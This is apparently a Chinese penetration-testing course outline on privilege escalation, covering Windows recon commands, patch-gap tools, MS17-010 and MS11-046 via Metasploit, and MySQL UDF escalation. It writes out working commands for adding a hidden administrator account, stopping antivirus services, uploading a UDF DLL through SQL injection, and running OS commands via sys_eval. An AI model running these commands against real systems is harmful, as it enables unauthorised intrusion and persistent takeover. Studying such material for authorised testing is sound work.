8-1提权基础 服务器配置(以apache2为例)
1. 提权本质
提权本质就是提升自己在服务器中的权限,获得更大的权限。
例如:在Windows下普通用户,通过提权获得Administrator一样的权限;在Linux中通过执行编译后的程序,从普通用户权限提升到root账号权限。
2. 提权分类
提权分为本地提权和远程提权
提权分为系统提权和第三方软件提权
3. 权限配置
一般情况下,Web服务会给与一个特定低权限用户维护服务,避免给与过高权限。
4. 菜刀连接测试
使用中国菜刀工具在不同权限下执行 net user username password /add 查看不同的结果。
8-2Windows系统提权基础命令
1. 获取IP地址信息
IP地址是计算机在网络中的门牌号,用来寻找计算机的地址。同一台计算机有多个IP地址,可以有外部连接的IP地址,内部IP地址。
在提权过程中,如果有外网IP地址,可以直接使用3389端口进行远程桌面连接。如果只有内网IP地址,可以使用LCX等程序进行端口转发进行连接登录。
在Windows系统下使用ipconfig /all 查看网卡信息。
2. 获取端口信息
端口是计算机与外部连接的一个接口,每一个开放的服务对应一个端口,用来进行连接。
在Windows下可以使用 netstat 命令获取端口开放状态。
netstat -an 获取当前主机所有端口的开放情况及网络连接情况。
3. 获取服务信息和进程信息
在Windows系统下很多第三方软件都使用服务启动。如果使用第三方软件漏洞进行提权,必须了解以服务方式开启的第三方软件。
可以使用 net start 命令查看系统所开启的所有服务
也可以使用 net stop 服务名称 关闭服务,例如杀毒软件等。
在Windows系统下可以使用 tasklist /svc 命令获取运行的进程名称、服务和PID。
4. 进程结束、用户管理命令
使用 taskkill来结束进程。 taskkill /? 获取帮助信息。
在Windows系统下,系统访问需要有对应的用户和密码。
可以通过以下命令添加用户:
net user username password /add
net localgroup administrator username /add
8-3Windows提权辅助工具
1. 辅助工具介绍
Windows-Exploit-Suggester 此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标上潜在的缺失补丁。
2. 辅助工具安装
环境:python2.7、安装xlrd模块
执行 --update以获取漏洞文件
3. 辅助工具命令行介绍
使用 -h 参数获取帮助信息。
4. 辅助工具使用技巧
查看本机补丁与漏洞文件中,可能存在的POC。
8-4Windows远程提权(以ms17-010为例)
1. 远程提权
在授权的情况下,针对目标机器进行渗透测试,需要对目标进行提权。可以首先扫描系统是否存在可利用漏洞,探测是否可以利用。
如何可以直接利用获得最高权限,那么就不需要本地提权,直接远程提权拿到最高权限。
2. ms17-010介绍
MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。
WannaCry(又叫Wanna Decryptor),一种“蠕虫式”的勒索病毒软件,大小3.3MB,由不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
3. 扫描探测ms17-010漏洞
在metasploit下直接利用ms17-010的漏洞扫描模块进行探测。
4. 利用ms17-010漏洞提权
在Metasploit下集成了ms17-010的漏洞利用模块
8-5Windows本地提权(以ms11-046为例)
1. 系统提权目的
一般情况下,系统管理员只会给与Web服务一个权限比较低的用户来运行。
系统提权的目的:就是利用系统漏洞来提升当前的运行权限,或者说时添加一个高权限用户。
2. 系统提权流程
1、获取执行cmd命令窗口,使用 systeminfo 查看当前系统补丁信息。
2、利用工具对不出没有打的补丁。
3. ms11_046提权
利用ms11_046提权。
4. 远程桌面连接
本地执行远程桌面客户端,连接服务端。
8-6Mysql UDF提权
1. udf介绍
UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。
在提权过程中,经常使用mysql 的udf.dll进行提权。并且提权之前,要上传udf.dll到指定的目录下。
使用 select @@plugin_dir;或 show variables like 'plugin%'; 查看具体目录。
修改目录方式:
1、mysqld.exe --plugin-dir=具体目录
2、mysqld.exe --defaults-file=具体目录
3、mysql.ini配置文件 plugin_dir=具体目录
2. udf.dll获取
sqlmap下自带了对应提权使用的udf库。可以直接下载使用,但是sqlmap进行加密,需要解密。
root@kali:/usr/share/sqlmap/extra/cloak# ./cloak.py -d -i /usr/share/sqlmap/udf/mysql/windows/32/lib_mysqludf_sys.dll_
3. 上传udf
将udf.dll文件上传到 具体目录下。
select @@plugin_dir;或 show variables like 'plugin%';
利用sql注入进行上传 select load_file() into dumpfile “具体路径”
直接利用菜刀拖拽到具体目录下。
4. 执行提权命令
create function sys_eval returns string soname 'udf.dll';
select * from mysql.func where name = 'sys_eval';
select sys_eval('dir');
select sys_eval('net user user1 123 /add');
select sys_eval('net localgroup administrators user1 /add');
drop function sys_eval;